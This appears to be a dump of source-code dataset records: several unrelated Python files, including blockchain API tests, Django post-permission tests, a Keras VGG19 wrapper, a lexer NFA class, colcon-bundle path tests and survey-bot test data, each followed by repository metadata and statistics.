assert response.status_code == 200
response_json = response.json()
assert len(response_json['results']) == 2
meta_0, meta_1 = response_json['results']
assert meta_1 == {
'start_block_number':
3,
'end_block_number':
5,
'url_path': (
'/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000003-00000000000000000005-block-chunk.msgpack.gz'
),
'urls': [
'http://localhost:8555/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000003-00000000000000000005-block-chunk.msgpack.gz'
]
}
assert meta_0 == {
'start_block_number':
6,
'end_block_number':
7,
'url_path': (
'/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000006-xxxxxxxxxxxxxxxxxxxx-block-chunk.msgpack'
),
'urls': [
'http://localhost:8555/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000006-xxxxxxxxxxxxxxxxxxxx-block-chunk.msgpack'
]
}
def test_can_order_block_chunk_meta_with_limit_and_offset(api_client, file_blockchain_with_three_block_chunks):
blockchain = file_blockchain_with_three_block_chunks
with force_blockchain(blockchain):
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?ordering=-start_block_number&limit=1&offset=1')
assert response.status_code == 200
response_json = response.json()
assert len(response_json['results']) == 1
(meta_0,) = response_json['results']
assert meta_0 == {
'start_block_number':
3,
'end_block_number':
5,
'url_path': (
'/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000003-00000000000000000005-block-chunk.msgpack.gz'
),
'urls': [
'http://localhost:8555/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000003-00000000000000000005-block-chunk.msgpack.gz'
]
}
@pytest.mark.parametrize(
'from_block_number,to_block_number,block_chunk_map', (
(0, None, {
0: 0,
1: 1,
2: 2
}),
(1, None, {
0: 0,
1: 1,
2: 2
}),
(2, None, {
0: 0,
1: 1,
2: 2
}),
(3, None, {
0: 1,
1: 2
}),
(4, None, {
0: 1,
1: 2
}),
(5, None, {
0: 1,
1: 2
}),
(6, None, {
0: 2
}),
(7, None, {
0: 2
}),
(8, None, {}),
(None, 10, {
0: 0,
1: 1,
2: 2
}),
(None, 9, {
0: 0,
1: 1,
2: 2
}),
(None, 8, {
0: 0,
1: 1,
2: 2
}),
(None, 7, {
0: 0,
1: 1,
2: 2
}),
(None, 6, {
0: 0,
1: 1,
2: 2
}),
(None, 5, {
0: 0,
1: 1
}),
(None, 4, {
0: 0,
1: 1
}),
(None, 3, {
0: 0,
1: 1
}),
(None, 2, {
0: 0
}),
(None, 1, {
0: 0
}),
(None, 0, {
0: 0
}),
(0, 10, {
0: 0,
1: 1,
2: 2
}),
(0, 9, {
0: 0,
1: 1,
2: 2
}),
(0, 8, {
0: 0,
1: 1,
2: 2
}),
(0, 7, {
0: 0,
1: 1,
2: 2
}),
(0, 6, {
0: 0,
1: 1,
2: 2
}),
(0, 5, {
0: 0,
1: 1
}),
(1, 5, {
0: 0,
1: 1
}),
(2, 5, {
0: 0,
1: 1
}),
(3, 5, {
0: 1
}),
(4, 5, {
0: 1
}),
(5, 5, {
0: 1
}),
)
)
def test_filter_by_block_number_range(
api_client, file_blockchain_with_three_block_chunks, from_block_number, to_block_number, block_chunk_map
):
blockchain = file_blockchain_with_three_block_chunks
with force_blockchain(blockchain):
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL)
assert response.status_code == 200
response_json = response.json()
block_chunks = response_json['results']
assert len(block_chunks) == 3
assert block_chunks[0]['start_block_number'] == 0 and block_chunks[0]['end_block_number'] == 2
assert block_chunks[1]['start_block_number'] == 3 and block_chunks[1]['end_block_number'] == 5
assert block_chunks[2]['start_block_number'] == 6 and block_chunks[2]['end_block_number'] == 7
query_parameters = {}
if from_block_number is not None:
query_parameters['from_block_number'] = from_block_number
if to_block_number is not None:
query_parameters['to_block_number'] = to_block_number
with force_blockchain(blockchain):
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?' + urlencode(query_parameters))
assert response.status_code == 200
response_json = response.json()
filtered_block_chunks = response_json['results']
assert len(filtered_block_chunks) == len(block_chunk_map)
for filtered_index, original_index in block_chunk_map.items():
assert block_chunks[original_index] == filtered_block_chunks[filtered_index]
| 28.548851
| 118
| 0.535682
| 1,148
| 9,935
| 4.383275
| 0.078397
| 0.059618
| 0.06558
| 0.072337
| 0.869038
| 0.833466
| 0.827703
| 0.773052
| 0.764507
| 0.731916
| 0
| 0.157543
| 0.338098
| 9,935
| 347
| 119
| 28.631124
| 0.607664
| 0
| 0
| 0.72956
| 0
| 0.056604
| 0.288576
| 0.170106
| 0
| 0
| 0
| 0
| 0.078616
| 1
| 0.015723
| false
| 0
| 0.009434
| 0
| 0.025157
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b71c7c8ee0ec8c505b04916c37e1b391d5316344
| 220
|
py
|
Python
|
my_utils/__init__.py
|
Damego/DiscordBOT
|
a7f6115a064043c0f8c6834756096086636d3f0f
|
[
"MIT"
] | 3
|
2021-09-22T21:12:29.000Z
|
2021-12-23T16:22:25.000Z
|
my_utils/__init__.py
|
Damego/DiscordBOT
|
a7f6115a064043c0f8c6834756096086636d3f0f
|
[
"MIT"
] | null | null | null |
my_utils/__init__.py
|
Damego/DiscordBOT
|
a7f6115a064043c0f8c6834756096086636d3f0f
|
[
"MIT"
] | 1
|
2021-09-19T08:24:23.000Z
|
2021-09-19T08:24:23.000Z
|
from .asteroid_bot import AsteroidBot
from .errors import *
from .languages import *
from .checks import *
from .checks import _cog_is_enabled
from .consts import multiplier
from .functions import *
from .cog import Cog
| 24.444444
| 37
| 0.8
| 31
| 220
| 5.548387
| 0.451613
| 0.232558
| 0.186047
| 0.255814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145455
| 220
| 8
| 38
| 27.5
| 0.914894
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3fc02f5a153277b2b207f6d4ba4a5b05a1388c83
| 40
|
py
|
Python
|
2020/20200310/demonstration.py
|
cbchoi/SIT32004
|
699598fc321845e46e5cce81c6c2a60999698e6e
|
[
"MIT"
] | 1
|
2019-03-04T05:35:37.000Z
|
2019-03-04T05:35:37.000Z
|
2020/20200310/demonstration.py
|
cbchoi/SIT32004
|
699598fc321845e46e5cce81c6c2a60999698e6e
|
[
"MIT"
] | null | null | null |
2020/20200310/demonstration.py
|
cbchoi/SIT32004
|
699598fc321845e46e5cce81c6c2a60999698e6e
|
[
"MIT"
] | 6
|
2019-03-10T23:39:10.000Z
|
2020-03-20T11:37:12.000Z
|
t = (1, 2)
print(t)
l = [1, 2]
print(l)
| 8
| 10
| 0.45
| 10
| 40
| 1.8
| 0.5
| 0.222222
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 0.25
| 40
| 5
| 11
| 8
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 1
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
b7511532f272bda78607f86d1007400ed7af72b6
| 4,710
|
py
|
Python
|
tests/test_post.py
|
MarieEngel/message_board
|
f5dbc5cf592d3396a2f9358ad25e64a2d858569c
|
[
"MIT"
] | null | null | null |
tests/test_post.py
|
MarieEngel/message_board
|
f5dbc5cf592d3396a2f9358ad25e64a2d858569c
|
[
"MIT"
] | null | null | null |
tests/test_post.py
|
MarieEngel/message_board
|
f5dbc5cf592d3396a2f9358ad25e64a2d858569c
|
[
"MIT"
] | 1
|
2022-03-31T21:59:29.000Z
|
2022-03-31T21:59:29.000Z
|
from django.test import TestCase
class TestPost(TestCase):
fixtures = [
"user_test.json",
"category_test.json",
"post_test.json",
"comment_test.json",
]
def test_add_post(self):
"""Tests if a post created will show up on the home page."""
self.client.login(username="anna", password="password")
response = self.client.post(
"/post/add/",
{
"title": "Some title",
"body": "Some text",
"category": 1,
"_save": "SAVE",
},
)
self.assertRedirects(response, "/")
response = self.client.get("/")
self.assertContains(response, "Some title")
def test_delete_post(self):
"""Tests if a deleted post will not show up on the home page."""
self.client.login(username="anna", password="password")
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Has anybody seen my cow")
response = self.client.post("/post/1/delete/", follow=True)
self.assertEqual(response.status_code, 200)
response = self.client.get("/")
self.assertNotContains(response, "Has anybody seen my cow")
def test_update_post(self):
"""Tests if an updated post will show up on the home page."""
self.client.login(username="anna", password="password")
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Has anybody seen my cow")
self.assertNotContains(response, "Has anybody seen my crow")
response = self.client.post(
"/post/1/update/",
{
"title": "Has anybody seen my crow",
"body": "My lovely crow is missing.",
"category": 1,
"_save": "SAVE",
},
follow=True,
)
self.assertEqual(response.status_code, 200)
response = self.client.get("/")
self.assertContains(response, "Has anybody seen my crow")
def test_add_post_anonymous_user(self):
"""Tests if a not logged in user can add a post."""
response = self.client.get("/post/add/")
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, "/user/login/?next=/post/add/")
def test_delete_post_anonymous_user(self):
"""Tests if a not logged in user can delete a post."""
response = self.client.get("/post/1/delete/")
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, "/user/login/?next=/post/1/delete/")
def test_update_post_anonymous_user(self):
"""Tests if a not logged in user can update a post."""
response = self.client.get("/post/1/update/")
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, "/user/login/?next=/post/1/update/")
def test_delete_post_unauthorized_user(self):
"""Tests if a user that is not the author can delete a post."""
self.client.login(username="marie", password="password")
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Has anybody seen my cow")
response = self.client.post(
"/post/1/delete/",
{"_save": "SAVE"},
)
self.assertEqual(response.status_code, 403)
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Has anybody seen my cow")
def test_update_post_unauthorized_user(self):
"""Tests if a user that is not the author can update a post."""
self.client.login(username="marie", password="password")
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Has anybody seen my cow")
self.assertNotContains(response, "Has anybody seen my crow")
response = self.client.post(
"/post/1/update/",
{
"title": "Has anybody seen my crow",
"body": "My lovely crow is missing.",
"category": 1,
"_save": "SAVE",
},
follow=True,
)
self.assertEqual(response.status_code, 403)
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "Has anybody seen my crow")
self.assertContains(response, "Has anybody seen my cow")
| 40.25641
| 75
| 0.597028
| 554
| 4,710
| 4.990975
| 0.135379
| 0.079566
| 0.110669
| 0.136347
| 0.861121
| 0.846655
| 0.845208
| 0.797468
| 0.742495
| 0.742495
| 0
| 0.01636
| 0.273248
| 4,710
| 116
| 76
| 40.603448
| 0.791411
| 0.091083
| 0
| 0.5625
| 0
| 0
| 0.201415
| 0.02217
| 0
| 0
| 0
| 0
| 0.302083
| 1
| 0.083333
| false
| 0.052083
| 0.010417
| 0
| 0.114583
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
4d46cdd8e28cd9469d2f41c674d0e233484be3fb
| 123
|
py
|
Python
|
imagedt/decorator/__init__.py
|
Eddy-zheng/ImageDT
|
78c9e671526422f28bd564cad9879ef95f12b454
|
[
"Apache-2.0"
] | 9
|
2018-06-06T02:37:50.000Z
|
2020-07-16T12:23:26.000Z
|
imagedt/decorator/__init__.py
|
Eddy-zheng/ImageDT
|
78c9e671526422f28bd564cad9879ef95f12b454
|
[
"Apache-2.0"
] | null | null | null |
imagedt/decorator/__init__.py
|
Eddy-zheng/ImageDT
|
78c9e671526422f28bd564cad9879ef95f12b454
|
[
"Apache-2.0"
] | 5
|
2018-06-03T11:04:11.000Z
|
2018-12-26T11:37:22.000Z
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import print_function
from .decorator_time import *
| 24.6
| 38
| 0.837398
| 17
| 123
| 5.411765
| 0.647059
| 0.217391
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009259
| 0.121951
| 123
| 5
| 39
| 24.6
| 0.842593
| 0.105691
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4d6f83e1d11569faa9197e7c7389fef3117f9e22
| 518
|
py
|
Python
|
keras/applications/vgg19.py
|
PJmouraocs/keras
|
7a39b6c62d43c25472b2c2476bd2a8983ae4f682
|
[
"MIT"
] | 300
|
2018-04-04T05:01:21.000Z
|
2022-02-25T18:56:04.000Z
|
keras/applications/vgg19.py
|
PJmouraocs/keras
|
7a39b6c62d43c25472b2c2476bd2a8983ae4f682
|
[
"MIT"
] | 163
|
2018-04-03T17:41:22.000Z
|
2021-09-03T16:44:04.000Z
|
keras/applications/vgg19.py
|
PJmouraocs/keras
|
7a39b6c62d43c25472b2c2476bd2a8983ae4f682
|
[
"MIT"
] | 94
|
2016-02-17T20:59:27.000Z
|
2021-04-19T08:18:16.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from keras_applications import vgg19
from . import keras_modules_injection
@keras_modules_injection
def VGG19(*args, **kwargs):
return vgg19.VGG19(*args, **kwargs)
@keras_modules_injection
def decode_predictions(*args, **kwargs):
return vgg19.decode_predictions(*args, **kwargs)
@keras_modules_injection
def preprocess_input(*args, **kwargs):
return vgg19.preprocess_input(*args, **kwargs)
| 23.545455
| 52
| 0.795367
| 64
| 518
| 6.015625
| 0.3125
| 0.155844
| 0.218182
| 0.187013
| 0.176623
| 0.176623
| 0
| 0
| 0
| 0
| 0
| 0.026201
| 0.11583
| 518
| 21
| 53
| 24.666667
| 0.81441
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| true
| 0
| 0.357143
| 0.214286
| 0.785714
| 0.071429
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
4d9ff676d381a377d692cbb994f1c41c4ad66d0a
| 3,724
|
py
|
Python
|
pyacc/lexer/nfa.py
|
hdyuik/pyacc
|
85f6206388ce29a95e39b659257d45be9df250e5
|
[
"MIT"
] | 2
|
2019-06-21T23:45:09.000Z
|
2019-06-23T23:37:50.000Z
|
pyacc/lexer/nfa.py
|
hdyuik/compiler
|
85f6206388ce29a95e39b659257d45be9df250e5
|
[
"MIT"
] | null | null | null |
pyacc/lexer/nfa.py
|
hdyuik/compiler
|
85f6206388ce29a95e39b659257d45be9df250e5
|
[
"MIT"
] | null | null | null |
from pyacc.common import NFA, NFAState, NFAItems, epsilon
class LexerNFAItems(NFAItems):
def __init__(self):
self.token = None
class LexerNFAState(NFAState):
ItemStorageClass = LexerNFAItems
count = 0
class LexerNFA(NFA):
StateClass = LexerNFAState
def concat(self, right_nfa: "NFA") -> "NFA":
new_start_state = LexerNFA.StateClass()
new_start_state.link(epsilon, self.start_state)
for accepting_state in self.accepting_states:
accepting_state.link(epsilon, right_nfa.start_state)
new_accepting_state = LexerNFA.StateClass()
for accepting_state in right_nfa.accepting_states:
accepting_state.link(epsilon, new_accepting_state)
states = self.states.union(right_nfa.states, [new_start_state, new_accepting_state])
nfa_data = {
"start_state": new_start_state,
"accepting_states": {new_accepting_state, },
"states": states,
}
return LexerNFA(**nfa_data)
def union(self, right_nfa: "NFA") -> "NFA":
new_start_state = LexerNFA.StateClass()
new_start_state.link(epsilon, self.start_state)
new_start_state.link(epsilon, right_nfa.start_state)
new_accepting_state = LexerNFA.StateClass()
for accepting_state in self.accepting_states:
accepting_state.link(epsilon, new_accepting_state)
for accepting_state in right_nfa.accepting_states:
accepting_state.link(epsilon, new_accepting_state)
states = self.states.union(right_nfa.states).union([new_start_state, new_accepting_state])
nfa_data = {
"start_state": new_start_state,
"accepting_states": {new_accepting_state, },
"states": states,
}
return LexerNFA(**nfa_data)
def kleene_closure(self) -> "NFA":
new_start_state = LexerNFA.StateClass()
new_accepting_state = LexerNFA.StateClass()
new_start_state.link(epsilon, self.start_state)
new_start_state.link(epsilon, new_accepting_state)
for accepting_state in self.accepting_states:
accepting_state.link(epsilon, new_accepting_state)
accepting_state.link(epsilon, self.start_state)
states = self.states.union({new_start_state, new_accepting_state})
nfa_data = {
"start_state": new_start_state,
"accepting_states": {new_accepting_state, },
"states": states,
}
return LexerNFA(**nfa_data)
def question(self) -> "NFA":
new_start_state = LexerNFA.StateClass()
new_accepting_state = LexerNFA.StateClass()
new_start_state.link(epsilon, new_accepting_state)
new_start_state.link(epsilon, self.start_state)
for accepting_state in self.accepting_states:
accepting_state.link(epsilon, new_accepting_state)
states = self.states.union([new_start_state, new_accepting_state])
nfa_data = {
"start_state": new_start_state,
"accepting_states": {new_accepting_state, },
"states": states,
}
return LexerNFA(**nfa_data)
@classmethod
def one_of(cls, symbols: set) -> "NFA":
start_state = LexerNFA.StateClass()
accepting_state = LexerNFA.StateClass()
for symbol in symbols:
start_state.link(symbol, accepting_state)
nfa_data = {
"start_state": start_state,
"accepting_states": {accepting_state, },
"states": {start_state, accepting_state},
}
return LexerNFA(**nfa_data)
| 36.871287
| 99
| 0.637487
| 407
| 3,724
| 5.479115
| 0.108108
| 0.226009
| 0.110762
| 0.053363
| 0.807623
| 0.791928
| 0.766816
| 0.766816
| 0.759193
| 0.759193
| 0
| 0.000369
| 0.271751
| 3,724
| 100
| 100
| 37.24
| 0.821903
| 0
| 0
| 0.580247
| 0
| 0
| 0.051325
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.012346
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
128aa48e2909615349065a90e07801a2708c322b
| 5,481
|
py
|
Python
|
test/verb/test_path_context.py
|
rotu/colcon-bundle
|
b57dd328dca2750b31c6303e587d70913a9dfe9d
|
[
"Apache-2.0"
] | 31
|
2018-10-19T18:16:37.000Z
|
2021-07-05T06:54:38.000Z
|
test/verb/test_path_context.py
|
rotu/colcon-bundle
|
b57dd328dca2750b31c6303e587d70913a9dfe9d
|
[
"Apache-2.0"
] | 113
|
2018-10-24T17:33:50.000Z
|
2022-02-08T20:36:19.000Z
|
test/verb/test_path_context.py
|
rotu/colcon-bundle
|
b57dd328dca2750b31c6303e587d70913a9dfe9d
|
[
"Apache-2.0"
] | 30
|
2018-10-19T18:16:08.000Z
|
2022-03-24T01:21:27.000Z
|
import shutil
import tempfile
from pathlib import Path
from unittest import TestCase
from unittest.mock import patch, Mock
from colcon_bundle.verb._path_context import PathContext
class TestPathContext(TestCase):
def setUp(self):
self.install_base = tempfile.mkdtemp()
self.bundle_base = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.install_base)
shutil.rmtree(self.bundle_base)
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_version')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_tool')
@patch('colcon_bundle.verb._path_context.get_and_mark_bundle_cache_version')
def test_v2_cache(self, cache_version, *_):
cache_version.return_value = 2
context = PathContext(self.install_base, self.bundle_base, 2)
assert context.bundle_base() == self.bundle_base
assert context.install_base() == self.install_base
self._assert_under_cache_subpath(context.dependency_hash_path())
self._assert_under_cache_subpath(context.installer_cache_path())
self._assert_under_cache_subpath(context.dependency_hash_cache_path())
self._assert_under_cache_subpath(context.dependencies_overlay_path())
self._assert_under_cache_subpath(context.bundle_tar_path())
self._assert_under_cache_subpath(context.installer_metadata_path())
self._assert_under_cache_subpath(context.metadata_tar_path())
self._assert_under_cache_subpath(context.dependencies_staging_path())
self._assert_under_cache_subpath(context.version_file_path())
self._assert_under_cache_subpath(context.workspace_staging_path())
self._assert_under_cache_subpath(context.workspace_overlay_path())
self._assert_not_under_cache_subpath(context.bundle_v1_output_path())
self._assert_not_under_cache_subpath(context.bundle_v2_output_path())
self._assert_not_under_cache_subpath(context.sources_tar_gz_path())
def _assert_under_cache_subpath(self, path: str):
p = Path(path)
self.assertEqual(p.relative_to(self.bundle_base).parts[0], 'cache')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_version')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_tool')
@patch('colcon_bundle.verb._path_context.get_and_mark_bundle_cache_version')
def test_v1_no_cache(self, cache_version, *_):
cache_version.return_value = 1
context = PathContext(self.install_base, self.bundle_base, 2)
assert context.bundle_base() == self.bundle_base
assert context.install_base() == self.install_base
self._assert_not_under_cache_subpath(context.dependency_hash_path())
self._assert_not_under_cache_subpath(context.installer_cache_path())
self._assert_not_under_cache_subpath(context.dependency_hash_cache_path())
self._assert_not_under_cache_subpath(context.dependencies_overlay_path())
self._assert_not_under_cache_subpath(context.bundle_tar_path())
self._assert_not_under_cache_subpath(context.installer_metadata_path())
self._assert_not_under_cache_subpath(context.metadata_tar_path())
self._assert_not_under_cache_subpath(context.dependencies_staging_path())
self._assert_not_under_cache_subpath(context.version_file_path())
self._assert_not_under_cache_subpath(context.workspace_staging_path())
self._assert_not_under_cache_subpath(context.workspace_overlay_path())
self._assert_not_under_cache_subpath(context.bundle_v1_output_path())
self._assert_not_under_cache_subpath(context.bundle_v2_output_path())
self._assert_not_under_cache_subpath(context.sources_tar_gz_path())
def _assert_not_under_cache_subpath(self, path: str):
p = Path(path)
self.assertNotEqual(p.relative_to(self.bundle_base).parts[0], 'cache')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_version')
@patch('colcon_bundle.verb._path_context.get_and_mark_bundle_cache_version')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_tool')
def test_initalize_bundle_base_does_not_exist(self, bundle_tool, cache_version, bundle_version):
shutil.rmtree(self.bundle_base)
PathContext(self.install_base, self.bundle_base, 2)
bundle_version.assert_called_with(self.bundle_base,
this_bundle_version=2,
previously_bundled=False)
cache_version.assert_called_with(self.bundle_base,
previously_bundled=False)
bundle_tool.assert_called_with(self.bundle_base)
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_version')
@patch('colcon_bundle.verb._path_context.get_and_mark_bundle_cache_version')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_tool')
def test_initalize_bundle_base_does_exist(self, bundle_tool, cache_version, bundle_version):
PathContext(self.install_base, self.bundle_base, 2)
bundle_version.assert_called_with(self.bundle_base,
this_bundle_version=2,
previously_bundled=True)
cache_version.assert_called_with(self.bundle_base,
previously_bundled=True)
bundle_tool.assert_called_with(self.bundle_base)
| 54.81
| 100
| 0.747491
| 702
| 5,481
| 5.294872
| 0.106838
| 0.08071
| 0.137207
| 0.180791
| 0.913909
| 0.895615
| 0.895615
| 0.895615
| 0.829701
| 0.58219
| 0
| 0.003515
| 0.169495
| 5,481
| 100
| 101
| 54.81
| 0.813049
| 0
| 0
| 0.488372
| 0
| 0
| 0.138271
| 0.136447
| 0
| 0
| 0
| 0
| 0.488372
| 1
| 0.093023
| false
| 0
| 0.069767
| 0
| 0.174419
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
421532621986457802fd95ba91e9c526586590df
| 72,450
|
py
|
Python
|
tests/utils/data.py
|
daniyal7915/spatial-survey-bot
|
740f4cda26be6882a3d36e62fec66c1b49f2a360
|
[
"MIT"
] | null | null | null |
tests/utils/data.py
|
daniyal7915/spatial-survey-bot
|
740f4cda26be6882a3d36e62fec66c1b49f2a360
|
[
"MIT"
] | null | null | null |
tests/utils/data.py
|
daniyal7915/spatial-survey-bot
|
740f4cda26be6882a3d36e62fec66c1b49f2a360
|
[
"MIT"
] | null | null | null |
import datetime
from engine.utils.utils import DotDict
class Data:
"""Container with the input data for test_process.py"""
num = 0
@property
def data_ques_ans(self):
return {'question': [(f'question{self.num}_1',), (f'question{self.num}_2',)],
'answer': [(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num + 1}_1',), (f'answer{self.num + 1}_2',),
(f'answer{self.num + 2}_1',), (f'answer{self.num + 2}_2',)],
'count': 2}
@property
def data_question(self):
return [(f'question{self.num}_1',), (f'question{self.num}_2',)]
@property
def data_double_answer(self):
return [(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num + 1}_1',), (f'answer{self.num + 1}_2',),
(f'answer{self.num + 2}_1',), (f'answer{self.num + 2}_2',),
(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num + 1}_1',), (f'answer{self.num + 1}_2',),
(f'answer{self.num + 2}_1',), (f'answer{self.num + 2}_2',)]
@property
def data_credentials(self):
return 'postgres://bot:1234@localhost:5432/test_db'
@property
def data_states(self):
return {'INIT': 1, 'SURVEY1': 2, 'SURVEY2': 3, 'SURVEY3': 4, 'COLLECT': 5, 'POINT': 6, 'POLYGON': 7,
'TRANSIT': 8, 'MEDIA1': 9, 'MEDIA2': 10, 'QUESTION1': 11, 'QUESTION2': 12, 'ANSWER': 13, 'CHECK1': 14,
'CHECK2': 15, 'SUBMIT': 16, 'RESULT': 17}
@property
def data_point(self):
return 'POINT(45 45)'
@property
def data_polygon(self):
return 'POLYGON((46 45,47 46,48 47,45 48,46 45))'
@property
def data_ans_check(self):
return [1, 'null']
@property
def data_get_question(self):
return 10
@property
def data_get_q_count(self):
return [25, 29]
@property
def data_set_ans_check(self):
return 11
@property
def data_answer_insert(self):
return [[3, 2, 1], ['_1', '_2', '_3']]
@property
def data_get_pp(self):
return '54.0 54.0, 45.0 46.0, 50.0 56.0'
@property
def data_append_pp(self):
return [[True, '54.0 54.0', None], '48.0', '58.0']
@property
def data_get_count(self):
return [True, '54.0 54.0, 45.0 46.0, 50.0 56.0', None]
@property
def data_point_polygon_manual(self):
return ['12345 qwerty', '12345, qwerty', '-89, 179', '91, -181', '91, 179', '0, 181',
'1234567890' * 6]
@property
def data_point_polygon_location(self):
return [-89, 179]
@property
def data_polygon_create(self):
return '54.35 54,45 46,50 56'
@property
def data_time(self):
return datetime.datetime.now().strftime("%Y")
@property
def data_save_media(self):
return '/test_path'
@property
def data_media_path(self):
file_info = DotDict({'file_path': 1034})
return ['1234', file_info, 'media']
@property
def data_map_center(self):
return [['-45 -45', '70 45'], ['-45 -45', '45 45'], ['-40 -30', '70 30']]
@property
def data_adjust(self):
return ['BOX(-45 -45,45 45)', 'BOX(-40 -30,70 30)']
@property
def data_get_scale(self):
return [19, 599999, 13389850]
@property
def data_gjson_shp(self):
return [[572000, 371], [372, 573000]]
@property
def data_count(self):
return 2
@property
def data_distance(self):
return 15038278
@property
def data_scale(self):
return 1
@property
def data_double_point(self):
return [[45.0, 45.0], [-45.0, -45.0]]
@property
def data_double_polygon(self):
return [[[30.0, 30.0], [-30.0, -30.0], [10.0, 20.0], [30.0, 30.0]],
[[40.0, 10.0], [-40.0, -10.0], [70.0, 20.0], [40.0, 10.0]]]
@property
def data_quad_point(self):
return [[45.0, 45.0], [-45.0, -45.0], [45.0, 45.0], [-45.0, -45.0]]
@property
def data_quad_polygon(self):
return [[[30.0, 30.0], [-30.0, -30.0], [10.0, 20.0], [30.0, 30.0]],
[[40.0, 10.0], [-40.0, -10.0], [70.0, 20.0], [40.0, 10.0]],
